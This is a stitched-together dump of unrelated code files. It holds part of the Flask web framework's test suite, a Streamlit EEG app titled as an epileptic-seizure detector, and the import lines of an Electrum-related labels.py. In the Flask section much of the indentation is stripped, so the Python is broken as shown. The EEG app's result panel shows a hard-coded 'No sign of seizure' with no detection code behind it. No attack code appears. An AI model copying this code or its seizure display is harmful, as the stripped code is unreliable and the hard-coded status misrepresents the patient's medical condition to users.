@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
    # The with statement is important because otherwise an exception is left
    # on the stack, which could negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return u"Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return u"Hällo Wörld".encode("utf-8")
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response("Hello world", 404, {"X-Foo": "Baz"}),
{"X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == u"Hällo Wörld".encode("utf-8")
assert client.get("/bytes").data == u"Hällo Wörld".encode("utf-8")
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.headers.getlist("X-Foo") == ["Baz", "Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python >= 3.7")
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
    # We have to run this test in an isolated thread because if the
    # debug flag is set to true and an exception happens, the context is
    # not torn down. This causes other tests that run after this one to
    # fail when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
        raise AssertionError()  # unreachable: the form access above aborts with 413
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
        raise AssertionError()  # unreachable: the form access above aborts with 413
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u"/киртест")
def index():
return "Hello World!"
rv = client.get(u"/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert ("Make sure to directly send your POST-request to this URL") in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = "running on %s:%s ..." % (hostname, port)
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == "running on %s:%s ..." % (hostname, port)
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
|
newdes.py
|
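# newdes.py -- Streamlit front end for live or replayed EEG data (as read from
# the code below): Client owns two queues and the worker threads. collect_data()
# fills both queues with frames of five EEG channels, either streamed live from
# a BrainFlow board (Real) or replayed from a recorded file in 4-row chunks,
# one chunk every 1/64 s (Fake). print_data() drains the main queue every
# 5 seconds and marks its items done so q.join() in streaming_app() can return;
# the Streamlit page plots the most recent samples from the plotting queue.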
import time
import altair
import numpy as np
from brainflow.board_shim import BoardShim, BrainFlowInputParams, BoardIds
import pandas as pd
import tkinter as tk
from tkinter import filedialog
from queue import Queue
from threading import Thread
from pathlib import Path
import streamlit as st
import matplotlib.pyplot as plt
class Client():
def __init__(self, datatype, q, q_for_ploting):
self.params = BrainFlowInputParams()
self.params.serial_port = 'com3'
self.params.board_id = 0
self.board = BoardShim(0, self.params)
self.datatype = datatype
self.file_path = None
self.fake_matrix = None
self.df = None
self.fake_df = None
self.times_to_go_over = 0
self.q = q
self.q_for_ploting = q_for_ploting
def start_print(self):
t2 = Thread(target=Client.print_data, args=(self,))
t2.start()
def print_data(self):
while True:
time.sleep(5)
# return 1
temporary_df = pd.DataFrame()
for i in range(self.q.qsize()):
temporary_df = pd.concat([temporary_df, self.q.get()])
self.q.task_done()
def start_collect(self, dataype):
t1 = Thread(target=Client.collect_data, args=(self, dataype))
t1.start()
def collect_data(self, datatype):
if datatype == 'real':
start_real = Real(self, self.q, self.q_for_ploting)
start_real.start_stream()
while True:
time.sleep(0.2)
d = start_real.read_data()
A = pd.DataFrame(d[0:6, :])
A = A.transpose()
A.columns = ["samples", "channel 1", "channel 2", "channel 3",
"channel 4", "channel 5"]
B = A
self.q.put(A)
self.q_for_ploting.put(B)
else:
start_fake = Fake(self, self.q, self.q_for_ploting)
start_fake.choose_file()
data = start_fake.read_file()
times = start_fake.passes_calc()
for i in range(times):
time.sleep(1 / 64)
temp_df = data[i * 4:i * 4 + 4]
self.q.put(temp_df)
self.q_for_ploting.put(temp_df)
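# Real wraps a live BrainFlow session: prepare and start the stream, then poll
# get_board_data() for whatever samples accumulated since the last read.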
class Real(Client):
def start_stream(self):
self.board.prepare_session()
self.board.start_stream()
def read_data(self):
data = self.board.get_board_data()
return data
def stop_stream(self):
self.board.stop_stream()
self.board.release_session()
class Fake(Client):
def choose_file(self):
root = tk.Tk()
root.withdraw()
self.file_path = Path(filedialog.askopenfilename())
return self.file_path
def read_file(self):
self.df = pd.read_csv(self.file_path, sep=" ", header=None,
names=["samples", "channel 1", "channel 2", "channel 3",
"channel 4", "channel 5"])
return self.df
def passes_calc(self):
rows = len(self.df.index)
self.times_to_go_over = int(np.floor(rows / 4))
return self.times_to_go_over
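# streaming_app builds the Streamlit page: it starts the collector and printer
# threads, then loops forever redrawing the last 500 samples of channels 1-3
# from the plotting queue with matplotlib.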
def streaming_app():
datatype = 'real'
q = Queue()
q_for_plotting = Queue()
c = Client(datatype, q, q_for_plotting)
st.set_page_config(page_title='Epileptic seizures detector/predictor', page_icon='😊')
st.image(r'BioMedTechnionLogoEngColorW2-NEW.png', width=500)
st.title("Epileptic seizures detector/predictor")
# hide the menu button
st.markdown(""" <style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style> """, unsafe_allow_html=True)
# condense the layout - remove the padding between components of website
padding = 0
st.markdown(f""" <style>
.reportview-container .main .block-container{{
padding-top: {padding}rem;
padding-right: {padding}rem;
padding-left: {padding}rem;
padding-bottom: {padding}rem;
}} </style> """, unsafe_allow_html=True)
# Using object notation
add_selectbox = st.sidebar.selectbox(
"Who would you like to contact in case of an emergency?",
("Contact1", "Contact2", "Contact3")
)
col1, col2, col3 = st.columns((10, 4, 1))
col1.header("Live Data")
col2.header("Result")
col2.text('No sign of seizure')
# col2.image("result.jpg", width=100)
c.start_collect(datatype)
c.start_print()
q.join()
placeholder = col1.empty()
placeholder_2 = col1.empty()
placeholder_3 = col1.empty()
data = pd.DataFrame()
time.sleep(2.5)
with st.sidebar:
add_radio = st.radio(
"are you wearing the deivce?",
("YES", "NO")
)
# lines = altair.Chart(data).mark_line().encode(x=altair.X('1:T'))
# # with placeholder.container():
# line_plot = st.altair_chart(lines)
# while True:
# data = abs(pd.concat([data, q_for_plotting.get() / 1000]))
# step_df = data.iloc[-500:, 1]
# lines = plot_animation(step_df)
# line_plot = line_plot.altair_chart(lines)
# time.sleep(0.1)
with placeholder.container():
while True:
fig, ax = plt.subplots(3)
data = abs(pd.concat([data, q_for_plotting.get() / 1000],ignore_index=True))
ax[0].plot(data.iloc[-500:, 1])
# ax[0].set_title('EEG 1')
ax[0].set_xticks([])
ax[0].set_yticks([])
ax[1].plot(data.iloc[-500:, 2])
# ax[1].set_title('\n EEG 2')
ax[1].set_xticks([])
ax[1].set_yticks([])
ax[2].plot(data.iloc[-500:, 3])
ax[2].set_xticks([])
ax[2].set_yticks([])
# ax[2].set_title('\n EEG 3')
plt.draw()
placeholder.plotly_chart(fig)
q_for_plotting.task_done()
time.sleep(0.01)
# with placeholder.container():
# fig = plt.figure()
# while True:
# test = [data,q_for_plotting.get() / 1000]
# data = abs(pd.concat[test,data])
# data = data.iloc[-500:, 1:4]
# placeholder.pyplot(fig)
# q_for_plotting.task_done()
# time.sleep(0.01)
# with placeholder.container():
# while True:
# data = abs(pd.concat([data, q_for_plotting.get() / 1000],ignore_index=True))
# chart = (
# altair.Chart(
# data=pd.DataFrame(data.iloc[-500:, :]),
# title="EEG Channel 1",
# )
# .mark_line()
# .encode(
# x=altair.X("samples", axis=altair.Axis(title="samples")),
# y=altair.Y("channel 1", axis=altair.Axis(title="channel 1")),
# )
# )
# placeholder = placeholder.altair_chart(chart)
# chart = (
# altair.Chart(
# data=pd.DataFrame(data.iloc[-500:, :]),
# title="EEG Channel 1",
# )
# .mark_line()
# .encode(
# x=altair.X("samples", axis=altair.Axis(title="samples")),
# y=altair.Y("channel 2", axis=altair.Axis(title="channel 2")),
# )
# )
# placeholder_2 = placeholder_2.altair_chart(chart)
# chart = (
# altair.Chart(
# data=pd.DataFrame(data.iloc[-500:, :]),
# title="EEG Channel 1",
# )
# .mark_line()
# .encode(
# x=altair.X("samples", axis=altair.Axis(title="samples")),
# y=altair.Y("channel 3", axis=altair.Axis(title="channel 3")),
# )
# )
# placeholder_3 = placeholder_3.altair_chart(chart)
# q_for_plotting.task_done()
# time.sleep(0.01)
# with placeholder.container():
#
# while True:
#
# data = abs(pd.concat([data, q_for_plotting.get() / 1000]))
# placeholder.line_chart(data.iloc[-256:, 1:4])
#
# q_for_plotting.task_done()
# time.sleep(0.01)
streaming_app()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum_seci
